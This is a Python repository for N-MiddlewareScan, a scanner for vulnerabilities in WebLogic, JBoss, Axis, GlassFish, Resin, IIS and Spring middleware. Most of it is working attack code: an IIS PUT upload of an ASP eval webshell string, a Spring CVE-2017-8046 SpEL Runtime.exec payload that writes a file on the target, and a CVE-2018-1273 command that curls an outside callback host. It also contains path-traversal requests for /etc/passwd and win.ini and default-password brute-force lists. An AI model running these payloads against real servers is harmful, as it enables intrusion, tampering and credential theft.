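        weblogic_special_plugin_,
        jboss_special_plugin_,
        struts2_special_plugin_,
        spring_special_plugin_,
        IIS_special_plugin_,
        Nginx_special_plugin_,
    )
    # The original wrote Thread(check(arg, config)): that ran the check
    # synchronously in the calling thread and handed its None result to
    # Thread as `group`, so the started threads had no target and did nothing.
    threads = [threading.Thread(target=check, args=(arg, config)) for check in checks]
    for thread in threads:
        try:
            thread.start()
        except RuntimeError as e:
            # start() only raises for an already-started thread; report it
            # instead of silently dropping the check.
            print("special_plugin_: could not start {}: {}".format(thread.name, e))
    for thread in threads:
        thread.join()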
28 |
29 |
--------------------------------------------------------------------------------
/plugins/jboss_plugin.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
# Paths probed on a JBoss host; each one becomes a GET entry in `pocs`.
_JBOSS_PATHS = (
    "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
    "/web-console/Invoker",
    "/invoker/JMXInvokerServlet",
    "/admin-console/",
)


def _jboss_entry(path):
    """Build one PoC dict: GET *path*, name the path on success, and report
    "<path> 扫描完成" when the check ends. No flags or credentials are set."""
    return {
        "requests_option": "GET",
        "url": [path],
        "params": [],
        "data": [],
        "flag": [],
        "success": path,
        "fail": "",
        "end": path + " 扫描完成",
        "admin_bursk": "",
        "username": [],
        "password": [],
    }


pocs = [_jboss_entry(p) for p in _JBOSS_PATHS]
52 |
53 |
54 |
--------------------------------------------------------------------------------
/plugins/axis_plugin.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
# PoC table for "Axis" targets; one dict per check. The runner that consumes
# these keys is not in this file, so the field notes below are read off the
# values, not from a schema.
# NOTE(review): the first entry targets a ".srv" handler with a return_page
# parameter, while the other two are Apache Axis2 pages — these look like two
# different products sharing the name; confirm the intended target.
pocs=[
    # 1. Marker check reported as CVE_2018_10661: GET /index.html/a.srv and
    #    look for "it_worked" in the reply. NOTE(review): "data" is set on a
    #    GET entry, and "username"/"password" are '' here but lists elsewhere
    #    — confirm the runner tolerates both shapes.
    {"requests_option":"GET",
    "url":["/index.html/a.srv"],
    "params":[],
    "data":["action=abc&return_page=it_worked"],
    "flag":["it_worked"],
    "success":"exist CVE_2018_10661",
    "fail":"Not exist CVE_2018_10661",
    "end":"CVE_2018_10661 测试结束",
    "admin_bursk":"",
    "username":'',
    "password":"",
    },
    # 2. Information disclosure: the Axis2 "Happy Axis" diagnostics page.
    {"requests_option":"GET",
    "url":["/axis2/axis2-web/HappyAxis.jsp"],
    "params":[],
    "data":[],
    "flag":["Axis2 Happiness Page"],
    "success":"exist Axis Information Disclosure,/axis2/axis2-web/HappyAxis.jsp",
    "fail":"NOT exist /axis2/axis2-web/HappyAxis.jsp",
    "end":"/axis2/axis2-web/HappyAxis.jsp信息扫描完成",
    "admin_bursk":"",
    "username":'',
    "password":"",
    },
    # 3. Default/weak-credential check on the Axis2 admin login. Only this
    #    entry sets "admin_bursk" and carries credential lists; the %s
    #    placeholders in "data" are presumably filled from them by the runner
    #    — verify. "flag" lists strings expected on the post-login page.
    {"requests_option":"POST",
    "url":["/axis2/axis2-admin/login"],
    "params":[],
    "data":["userName=%s&password=%s&submit=+Login+"],
    "flag":['Administration Page', 'System Components', 'axis2-admin/upload','include page=\'footer.inc\'>', 'axis2-admin/logout'],
    "success":"/axis2/axis2-admin/login存在弱口令",
    "fail":"/axis2/axis2-admin/login不存在弱口令",
    "end":"/axis2/axis2-admin/login弱口令扫描完成",
    "admin_bursk":"True",
    "username":['axis_plugin_catalog', 'admin', 'manager', 'root'],
    "password":['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'],
    },
]
--------------------------------------------------------------------------------
/plugins/IIS_special_plugin_.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | import requests
3 | import sys
4 | import http.client
5 | import urllib.parse
6 | import threading
7 | import queue
8 | import time
def IIS_PUT(arg, config):
    """Active WebDAV PUT test: upload a marker body to arg.url, then delete it.

    This is a state-changing probe, not a read-only fingerprint: it writes
    ``data`` to the target and only issues the DELETE when the follow-up GET
    echoes the marker back. If the PUT succeeded but the GET does not show
    it, or the DELETE fails, the uploaded file stays on the server.

    Args:
        arg: object carrying the target in ``arg.url``.
        config: unused here; kept for the plugin call convention.

    Any exception is printed and swallowed.
    """
    try:
        url = arg.url
        data = '<%eval request("1111111111")%>'
        # Only the PUT is bounded; the GET and DELETE below have no timeout.
        res = requests.put(url=url, data=data, timeout=5)
        html_text = requests.get(url).text
        if '<%eval request("1111111111")%>' in html_text:
            print(('[+] {} 存在IIS PUT上传'.format(url)))
            # The DELETE's status is not checked; the "deleted" line is
            # printed regardless of whether the removal actually succeeded.
            requests.delete(url)
            print(('[+] {} 成功删除测试文件'.format(url)))
        else:
            print(('[-] {} 不存在IIS PUT上传'.format(url)))
    except Exception as e:
        print(e)
23 |
def IIS_shortname_Scanner(url):
    """Tilde short-name check: compare a wildcard 8.3 path against a bogus one.

    For GET and then OPTIONS, a 404 for ``/*~1*/a.aspx`` together with a
    non-404 for ``/l1j1e*~1*/a.aspx`` is printed as the vulnerable case;
    one verdict line is printed per method.

    Args:
        url: base URL of the IIS site (paths are appended with a leading "/").

    Returns:
        False, unconditionally; the verdict is only printed.

    Raises:
        Exception: wrapping any error from the requests (none has a timeout).
    """
    try:
        for _method in ['GET', 'OPTIONS']:
            if _method == 'GET':
                status_1 = requests.get(url+ '/*~1*/a.aspx') # an existed file/folder
                status_2 = requests.get(url + '/l1j1e*~1*/a.aspx') # not existed file/folder
            else:
                status_1 = requests.options(url + '/*~1*/a.aspx') # an existed file/folder
                status_2 = requests.options(url + '/l1j1e*~1*/a.aspx') # not existed file/folder
            if status_1.status_code == 404 and status_2.status_code != 404:
                print("Server 存在 IIS shortname vulnerable")
            else:
                print("Server 不存在 IIS shortname vulnerable")
        # NOTE(review): indentation of this line was not recoverable; it is
        # placed after the loop so both methods run — confirm against the
        # original.
        return False
    except Exception as e:
        raise Exception('[is_vul.Exception] %s' % str(e))
def IIS_special_plugin_(arg, config):
    """Entry point for the IIS checks: the PUT probe first, then the short-name probe.

    Both checks print their own verdicts.  Any exception raised by either one
    ends the sequence and is silently dropped.

    Args:
        arg: parsed CLI namespace (``arg.url`` is the target).
        config: scanner configuration, passed through to ``IIS_PUT``.
    """
    try:
        checks = (
            (IIS_PUT, (arg, config)),
            (IIS_shortname_Scanner, (arg.url,)),
        )
        for check, params in checks:
            check(*params)
    except Exception:
        pass
--------------------------------------------------------------------------------
/plugins/glassfish_plugin.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
# Request templates consumed by the generic runner (``plugins.plugins``, not
# part of this listing).  Key meanings, as far as the values here show them:
#   requests_option        HTTP method ("GET" / "POST")
#   url                    path(s) appended to the target
#   params / data          query parameters / body templates; the ``%s`` slots
#                          in ``data`` are presumably filled from username/password
#   flag                   substrings presumably searched for in the response
#   success / fail / end   messages for a hit, a miss and completion
#   admin_bursk            "True" on the credential-guessing entries, "" otherwise
#   username / password    candidate credential lists
# NOTE(review): the third entry reads windows/win.ini through a traversal path
# and its flag list contains the bare word "root", which occurs on many
# unrelated pages and will over-report; "[fonts]" alone is the specific marker.
pocs=[
    {"requests_option":"POST",
     "url":["/common/j_security_check"],
     "params":[],
     "data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"],
     "flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', 'Common Tasks', 'title=\"Logout from GlassFish'],
     "success":"exist /common/j_security_check weak password",
     "fail":"NOT exist /common/j_security_check weak password",
     "end":"",
     "admin_bursk":"True",
     "username":['admin'],
     "password":['admin', 'glassfish', 'password', '123456', '12345678', '123456789', 'admin123', 'admin888','admin1', 'administrator', '8888888', '123123', 'manager', 'root'],
    },
    {"requests_option":"POST",
     "url":["/j_security_check?loginButton=Login"],
     "params":[],
     "data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"],
     "flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', 'src=\"/index.jsf\"', 'Common Tasks','title=\"Logout from GlassFish'],
     "success":"exist /j_security_check?loginButton=Login weak password",
     "fail":"NOT exist /j_security_check?loginButton=Login weak password",
     "end":"/j_security_check?loginButton=Login 测试结束",
     "admin_bursk":"True",
     "username":['admin'],
     "password":['admin', 'glassfish', 'password', 'adminadmin', '123456', '12345678', '123456789', 'admin123','admin888', 'admin1', 'administrator', '8888888', '123123', 'manager', 'root'],
    },
    {"requests_option":"GET",
     "url":["/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],
     "params":[],
     "data":[],
     "flag":["[fonts]", "root"],
     "success":"exist Directory_traversal vuln",
     "fail":"NOT exist Directory_traversal vuln",
     "end":"exist Directory_traversal vuln 测试结束",
     "admin_bursk":"",
     "username":[],
     "password":[],
    },
]
40 |
41 |
--------------------------------------------------------------------------------
/plugins/weblogic_special_plugin_.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | from plugins.weblogic_poc import CVE_2015_4852
3 | from plugins.weblogic_poc import CVE_2016_0638
4 | from plugins.weblogic_poc import CVE_2016_3510
5 | from plugins.weblogic_poc import CVE_2017_3248
6 | from plugins.weblogic_poc import CVE_2017_3506
7 | from plugins.weblogic_poc import CVE_2018_2628
8 | from plugins.weblogic_poc import CVE_2018_2893
9 | from plugins.weblogic_poc import managerURL200
10 | from plugins.weblogic_poc import uddi_ssrf
11 | import threading
12 | import socket
def weblogic_special_plugin_(arg,config):
    """Run every probe in ``plugins.weblogic_poc`` against the host behind ``arg.url`` on port 7001.

    Args:
        arg: parsed CLI namespace; ``arg.url`` is resolved to an IP address.
        config: unused here.

    NOTE(review): ``threading.Thread(CVE_2015_4852.run(ip,port))`` calls ``run``
    right away on this thread and passes its return value as the Thread's
    ``group`` argument; no ``target`` is set, so the ``start``/``join`` loops
    below do nothing and the probes actually execute one after another while
    the list is built.  The intended form is
    ``threading.Thread(target=CVE_2015_4852.run, args=(ip, port))``.
    ``str.strip("http://")`` removes any leading/trailing characters from the
    set ``h t p : /`` (plus ``s`` for the second call) rather than the scheme
    prefix, and nothing removes a port or path, so ``gethostbyname`` can fail or
    resolve the wrong name; ``urllib.parse.urlparse(arg.url).hostname`` would be
    the robust form.  The port is fixed at 7001 regardless of ``arg.url``.
    """
    port=7001
    ip=socket.gethostbyname(arg.url.strip("http://").strip("https://"))
    threads=[]
    threads.append(threading.Thread(CVE_2015_4852.run(ip,port)))
    threads.append(threading.Thread(CVE_2016_0638.run(ip,port,0)))
    threads.append(threading.Thread(CVE_2016_3510.run(ip,port,0)))
    threads.append(threading.Thread(CVE_2017_3248.run(ip,port,0)))
    threads.append(threading.Thread(CVE_2017_3506.run(ip,port)))
    threads.append(threading.Thread(CVE_2018_2893.run(ip,port,0)))
    threads.append(threading.Thread(CVE_2018_2628.run(ip,port,0)))
    threads.append(threading.Thread(managerURL200.run(ip,port)))
    threads.append(threading.Thread(uddi_ssrf.run(ip,port)))
    #print(arg.url)
    for thread in threads:
        thread.start()  # no target: returns immediately
    for j in threads:
        j.join()
31 |
32 | '''
33 | try:
34 | threads[0].strat()
35 | except Exception:
36 | print("CVE_2015_4852 脚本出错")
37 | try:
38 | threads[1].start()
39 | except Exception:
40 | print("CVE_2016_0638 脚本出错")
41 | try:
42 | threads[2].start()
43 | except Exception:
44 | print("CVE_2016_3510 脚本出错")
45 | try:
46 | threads[3].start()
47 | except Exception:
48 | print("CVE_2017_3248 脚本出错")
49 | try:
50 | threads[4].start()
51 | except Exception:
52 | print("CVE_2017_3506 脚本出错")
53 | try:
54 | threads[5].start()
55 | except Exception:
56 | print("CVE_2018_2893 脚本出错")
57 | try:
58 | threads[6].start()
59 | except Exception:
60 | print("CVE_2018_2628 脚本出错")
61 | try:
62 | threads[7].start()
63 | except Exception:
64 | print("managerURL200 脚本出错")
65 | try:
66 | threads[8].start()
67 | except Exception:
68 | print("uddi_ssrf 脚本出错")
69 | '''
--------------------------------------------------------------------------------
/N-MiddlewareScan.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | #Author is Naivete
3 | #github:https://www.github.com/nihaohello
4 | #blog:http://www.youknowi.xin
5 | import sys
6 | import os
7 | import re
8 | import argparse
9 | import traceback
10 | import config
11 | import multiprocessing
12 | from concurrent.futures import ThreadPoolExecutor
13 | from plugins import plugins
14 | #80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080
class MiddlewareScan(object):
    """Thin façade over ``plugins.plugins``: keeps the target namespace and the config."""

    def __init__(self, arg, config):
        """Store the parsed CLI namespace and the configuration module."""
        self.arg = arg
        self.config = config

    def run(self):
        """Build the plugin pipeline for this target and execute it."""
        plugins.plugins(self.arg, self.config).run()
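def _scan_url(arg):
    """Run the plugin pipeline for one target, reporting (not propagating) failures.

    Args:
        arg: an ``argparse.Namespace`` whose ``url`` names one target.
    """
    try:
        MiddlewareScan(arg, config).run()
    except Exception:
        traceback.print_exc()  # was print(traceback.print_exc()), which also printed "None"


def _normalise_url(url):
    """Return *url* stripped of surrounding whitespace, with ``http://`` prepended when it has no scheme."""
    url = url.strip()
    if not re.match(r'^https?:/{2}\w.+$', url) and not url.startswith("http"):
        url = "http://" + url
    return url


def main():
    """Parse the command line and scan one URL (``-u``) and/or every URL in a file (``-i``).

    ``-t`` overrides ``config.ThreadNum``; ``-p`` defaults to "all".  File mode
    fans the targets out over a ``multiprocessing.Pool`` of ``config.Process``
    workers, each running ``_scan_url`` on its own copy of the namespace.

    Fixes relative to the previous version: the ``-u`` validation read an
    unbound name (``url`` instead of ``arg.url``); the file loop mutated one
    shared namespace and called ``S.run()`` inline, then handed the ``None``
    results to ``pool.apply_async``; ``-t`` stored a string where a count is
    expected; ``-h`` was re-executed through ``os.system``.
    """
    parser = argparse.ArgumentParser(description='MiddlewareScan By Naivete')
    parser.add_argument('-u', '--url', help='url site', dest='url')
    parser.add_argument('-i', '--file', help='file name , fill url ', dest='file')
    parser.add_argument('-p', '--options', help='options', dest='options')
    parser.add_argument('-t', '--thread', help='thread num', dest='thread', type=int)
    arg = parser.parse_args()
    if len(sys.argv) <= 2:
        parser.print_help()  # in-process; no shell round-trip through argv[0]
        sys.exit()
    print("开始检测中间件相关漏洞:")
    if arg.thread:
        config.ThreadNum = arg.thread
    if not arg.options:
        arg.options = "all"
    if arg.url:
        if not re.match(r'^https?:/{2}\w.+$', arg.url):
            print("输入标准的url,如:http://www.baidu.com")
            sys.exit()
        _scan_url(arg)
    if arg.file:
        with open(arg.file, encoding="utf-8") as f:
            targets = [line.rstrip("\n") for line in f]
        jobs = []
        for url in targets:
            if not url.strip():
                continue  # blank lines are not targets
            job_arg = argparse.Namespace(**vars(arg))  # per-target copy, safe to hand to a worker
            job_arg.url = _normalise_url(url)
            jobs.append(job_arg)
        pool = multiprocessing.Pool(config.Process)
        try:
            for job_arg in jobs:
                pool.apply_async(_scan_url, (job_arg,))
            pool.close()
            pool.join()
        except Exception:
            traceback.print_exc()
    print("\n\n相关漏洞检测完成。")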
68 | if __name__ == '__main__':
69 | main()
--------------------------------------------------------------------------------
/plugins/weblogic_poc/CVE_2017_3506.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import requests
12 | import re
13 | from sys import argv
14 |
# Static headers for the SOAP POST in ``poc``: a desktop browser User-Agent plus
# ``text/xml`` as the request Content-Type.
heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
}
21 |
def poc(url):
    """POST ``post_str`` to ``/wls-wsat/CoordinatorPortType`` and classify the SOAP faultstring.

    Args:
        url: host[:port] or full URL; ``http://`` is prepended when absent.

    Returns:
        A Chinese verdict string.  Never raises: every request/parse error
        collapses ``response`` to the empty string.

    NOTE(review): the XML between the triple quotes of ``post_str`` is blank in
    this listing (original lines 33-45 are not reproduced), so as shown the
    request body is whitespace only.  ``if "/" in url`` is always true once the
    scheme has been prepended.  The regex escapes its dot (``\\.*``), so it
    matches literal dots followed by ``</faultstring>`` rather than arbitrary
    text; after ``.group(0)`` ``response`` holds at most ``</faultstring>``, in
    which neither ``'java.lang.ProcessBuilder'`` nor ``"0"`` can occur, so the
    positive branch is unreachable — ``r".*</faultstring>"`` was probably
    intended.  Even then ``"0" in response`` matches any zero digit and would
    over-report.  TLS verification is disabled (``verify=False``).
    """
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''





'''

    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        response = re.search(r"\.*\<\/faultstring\>", response).group(0)
    except Exception as e:
        response = ""

    if 'java.lang.ProcessBuilder' in response or "0" in response:
        result = '[+]目标weblogic存在JAVA反序列化漏洞:CVE-2017-3506'
        return result
    else:
        result = '[-]目标weblogic未检测到CVE-2017-3506'
        return result
def run(rip, rport):
    """Join ``rip`` and ``rport`` into ``host:port``, run ``poc`` on it and print the verdict.

    Any exception (including a non-string ``rip``) is reported with a fixed
    Chinese error line instead of propagating.
    """
    try:
        target = rip + ':' + str(rport)
        verdict = poc(url=target)
        print(verdict)
    except Exception:
        print("CVE_2017_3506脚本出错")
73 |
74 | if __name__ == '__main__':
75 | run('127.0.0.1',7001)
--------------------------------------------------------------------------------
/plugins/spring_special_plugin_.py:
--------------------------------------------------------------------------------
1 | #coding-utf-8
2 | # SpringCVE-2017-8046
3 | # 执行的命令:/usr/bin/touch ./test.jsp
4 | # 利用小葵转ascii转换为47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112
5 | # 输入命令:python3 SpringCVE-2017-8046.py 207.246.80.61:8080
6 | import uuid
7 | import time
8 | import requests
9 | import json
10 | import sys
def CVE_2017_8046(arg,config):
    """Spring Data REST CVE-2017-8046 probe: create a ``/persons`` entry, then PATCH it with a SpEL ``path``.

    Args:
        arg: parsed CLI namespace; ``arg.url`` is the target.
        config: unused.

    NOTE(review): this is not a read-only check.  Per the header comments, the
    byte array in ``data2`` spells ``/usr/bin/touch ./test.jsp``, so a hit
    creates a file on the target.  ``arg.url`` is formatted into
    ``'http://{}/persons'``, but the scanner's ``main`` only passes URLs that
    already start with ``http(s)://``, producing ``http://http://…``; the
    resulting request error is then reported as "not vulnerable".
    ``response1`` is never checked, and no request has a timeout.
    """
    url=arg.url
    headers1 = {"Content-Type": "application/json",
                "Cache-Control": "no-cache"}
    headers2 = {"Content-Type": "application/json-patch+json",
                "Cache-Control": "no-cache"
                }
    data1 = {"firstName": "VulApps", "lastName": "VulApps"}
    data2 = [{"op": "replace",
              "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName",
              "value": "vulapps-demo"}]
    try:
        # create a record with a POST first
        url1 = r'http://{}/persons'.format(url)
        response1 = requests.post(url=url1, headers=headers1, data=json.dumps(data1))

        # run the POC against the record just created
        url2 = r'http://{}/persons/1'.format(url)
        response2 = requests.patch(url=url2, headers=headers2, data=json.dumps(data2))
        content2 = response2.text
        if 'maybe not public' in content2:
            print("[+]已在目标服务器的根目录下生成了test.jsp文件!")
    except Exception as e:
        print('[-]不存在SpringCVE-2017-8046漏洞!')
def CVE_2018_1273(arg,config):
    """Spring Data Commons CVE-2018-1273 probe using an out-of-band callback through exeye.io.

    The target is asked to run ``curl <random>.gefmaezi.exeye.io``; after a 5 s
    wait the Exeye API is queried for that random token.

    Args:
        arg: parsed CLI namespace; ``arg.url`` is the target.
        config: unused.

    NOTE(review): ``key = sys.argv[1]`` reads the scanner's first CLI argument
    (``-u``, ``-i`` …), not an Exeye API key, so the lookup cannot succeed as
    wired.  ``sys.exit(e.args)`` inside a plugin raises SystemExit, ending the
    calling thread or the whole scan rather than reporting one failed probe.
    The check discloses every scanned host to a third-party service and relies
    on the target having outbound DNS/HTTP, which defenders should expect to
    see in egress logs.  Currently disabled in ``spring_special_plugin_``.
    """
    try:
        key = sys.argv[1]  # Exeye_API
        target = arg.url  # target host
        random_chars = str(uuid.uuid4()).split('-')[0]

        url = r'http://{}/users'.format(target)
        data = {
            'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl {}.gefmaezi.exeye.io")]'.format(
                random_chars): '',
            'password': '',
            'repeatedPassword': ''}
        requests.post(url, data)

        # wait 5 seconds for Exeye to record the callback
        time.sleep(5)

        # query Exeye for the result
        url2 = r'https://exeye.io/api/records/web/{}.gefmaezi.exeye.io'.format(random_chars)
        text = requests.post(url2, data={'key': key}).text

        if random_chars in text:
            print('[+] {} exist CVE-2018-1273. [{}.gefmaezi.exeye.io]'.format(target, random_chars))
        else:
            print('[-] {} not exist'.format(target))
    except Exception as e:
        sys.exit(e.args)
def spring_special_plugin_(arg, config):
    """Entry point for the Spring checks; only the CVE-2017-8046 probe is enabled.

    ``CVE_2018_1273`` stays disabled below: it depends on an external Exeye key
    taken from ``sys.argv`` and calls ``sys.exit`` on any error.
    """
    CVE_2017_8046(arg, config)
    # CVE_2018_1273(arg, config)  # disabled
--------------------------------------------------------------------------------
/plugins/resin_plugin.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
# Request templates consumed by the generic runner (``plugins.plugins``, not in
# this listing).  Key meanings, as far as the values here show them:
#   requests_option        HTTP method ("GET" / "POST")
#   url                    path(s) appended to the target
#   params / data          query parameters / body templates; ``%s`` slots in
#                          ``data`` are presumably filled from username/password
#   flag                   substrings presumably searched for in the response
#   success / fail / end   messages for a hit, a miss and completion
#   admin_bursk            "True" on the credential-guessing entry, "" otherwise
#   username / password    candidate credential lists
# NOTE(review): entries 3-6 leave ``success`` and ``fail`` empty, so if the
# runner prints those strings a hit on them is reported as an empty line; the
# first entry's password list contains 'admin' twice (one wasted request).
pocs=[
    {"requests_option":"POST",
     "url":["/resin-admin/j_security_check?j_uri=index.php"],
     "params":[],
     "data":["j_username=%s&j_password=%s"],
     "flag":['Resin home: | ','The Resin version','Resin Summary'],
     "success":"exist /resin-admin/j_security_check?j_uri=index.php weak password",
     "fail":"NOT exist /resin-admin/j_security_check?j_uri=index.php weak password",
     "end":"/resin-admin/j_security_check?j_uri=index.php扫描完成",
     "admin_bursk":"True",
     "username":['admin'],
     "password":['admin','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root'],
    },
    {"requests_option":"GET",
     "url":["/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"],
     "params":[],
     "data":[],
     "flag":["root:"],
     "success":"exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
     "fail":"not exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
     "end":"/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
    },
    {"requests_option":"GET",
     "url":["/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml"],
     "params":[],
     "data":[],
     "flag":["xml version"],
     "success":"",
     "fail":"",
     "end":"/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
    },
    {"requests_option":"GET",
     "url":["/%20..\\web-inf"],
     "params":[],
     "data":[],
     "flag":["Directory of"],
     "success":"",
     "fail":"",
     "end":"/%20..\\web-inf扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
    },
    {"requests_option":"GET",
     "url":["/%3f.jsp"],
     "params":[],
     "data":[],
     "flag":["Directory of"],
     "success":"",
     "fail":"",
     "end":"/%3f.jsp扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
    },
    {"requests_option":"GET",
     "url":["/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],
     "params":[],
     "data":[],
     "flag":["root:"],
     "success":"",
     "fail":"",
     "end":"/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
    },
]
--------------------------------------------------------------------------------
/old_plugins/axis.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | import requests
3 | from user_agent import get_user_agent
def CVE_2018_10661(url):
    """POST to ``<url>/index.html/a.srv`` and report a hit when ``return_page`` is echoed back.

    Args:
        url: base URL; a trailing slash is stripped before the path is appended.

    Returns:
        "exist CVE_2018_10661" or "not exist CVE_2018_10661".  Every exception
        (connection errors included) is reported as "not exist", so an
        unreachable host and a clean negative are indistinguishable.

    NOTE(review): the ``.srv`` path and ``return_page`` echo belong to the Axis
    Communications camera advisory for this CVE, not to Apache Axis, which the
    rest of this plugin targets — confirm the intended scope.  No timeout is set.
    """
    try:
        headers = {'User-Agent': get_user_agent()}
        data = {"action": "abc", "return_page": "it_worked"}
        url = url.rstrip("/") + "/index.html/a.srv"
        s = requests.post(url=url, data=data, headers=headers)
        if "it_worked" in s.text:
            return "exist CVE_2018_10661"
        else:
            return "not exist CVE_2018_10661"
    except Exception:
        return "not exist CVE_2018_10661"
def axis_admin(host):
    """Try each username/password pair against ``/axis2/axis2-admin/login`` over plain HTTP.

    Args:
        host: host[:port]; ``http://`` is prepended unconditionally.

    Returns:
        ``'YES|<login_url> Axis Weak password <user>:<password>'`` on a hit,
        otherwise ``'axis_plugin_catalog no weak password。'``.

    NOTE(review): the response is bound to ``request`` but the next line reads
    ``res.text``; ``res`` is never assigned, so the very first attempt raises
    NameError, the inner ``except`` returns the negative message, and no pair
    is ever evaluated.  ``error_i`` is unused.  The POST has no timeout.
    """
    try:
        url = "http://%s" % (host)
        headers = {'User-Agent': get_user_agent()}
        error_i = 0
        flag_list = ['Administration Page', 'System Components', 'axis2-admin/upload',
                     'include page="footer.inc">', 'axis2-admin/logout']
        user_list = ['axis_plugin_catalog', 'admin', 'manager', 'root']
        pass_list = ['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888',
                     'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root']
        for user in user_list:
            for password in pass_list:
                try:
                    login_url = url + '/axis2/axis2-admin/login'
                    PostStr = 'userName=%s&password=%s&submit=+Login+' % (user, password)
                    request = requests.post(url=login_url, data=PostStr, headers=headers)
                    res_html = res.text  # ``res`` is unbound here
                except Exception:
                    return 'axis_plugin_catalog no weak password。'
                for flag in flag_list:
                    if flag in res_html:
                        info = '%s Axis Weak password %s:%s' % (login_url, user, password)
                        return 'YES|' + info
        return 'axis_plugin_catalog no weak password。'
    except Exception:
        return 'axis_plugin_catalog no weak password。'
42 |
def axis_info(host):
    """Look for the "Axis2 Happiness Page" marker and report it as an information disclosure.

    Args:
        host: host[:port]; ``http://`` is prepended unconditionally.

    Returns:
        ``'YES|<vul_url> Axis Information Disclosure'`` when the marker is found,
        otherwise ``'no axis_plugin_catalog info。'`` (also on any exception).

    NOTE(review): ``vul_url`` is built but the GET fetches ``url`` — the site
    root — so the marker is searched in the home page, not in HappyAxis.jsp;
    ``vul_url`` only appears in the printed message.  No timeout is set.
    """
    try:
        url = "http://%s" % (host)
        headers = {'User-Agent': get_user_agent()}
        vul_url = url + "/axis2/axis2-web/HappyAxis.jsp"
        try:
            s = requests.get(url=url, headers=headers)  # fetches the root, not vul_url
            res_html = s.text
        except Exception:
            return 'no axis_plugin_catalog info。'
        if "Axis2 Happiness Page" in res_html:
            info = vul_url + " Axis Information Disclosure"
            return 'YES|' + info
        return 'no axis_plugin_catalog info。'
    except Exception:
        return 'no axis_plugin_catalog info。'
def axis(url):
    """Run the three Axis checks against *url* in order and print each verdict string."""
    for check in (CVE_2018_10661, axis_admin, axis_info):
        print(check(url))
66 |
67 |
68 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 0.
2 | N-MiddlewareScan
3 | 魔改,自写的一款中间件漏洞扫描脚本
4 |
5 |
6 | 1.
7 | 最近在看web中间件的漏洞
8 | 看到一个三年前的脚本:https://github.com/ywolf/F-MiddlewareScan
9 | 想着自己写一个中间件相关的,真是脚本好写,poc和exp难
10 | github链接:https://github.com/nihaohello/N-MiddlewareScan
11 |
12 |
13 |
14 | 2.
15 | #plugins vuln poc exp
16 | 主要是下面模块:
17 | 1.axis
18 | xss 弱密码
19 | 2.glassfish
20 | 3.jboss
21 | 4.resin
22 | 5.weblogic
23 | 6.tomcat
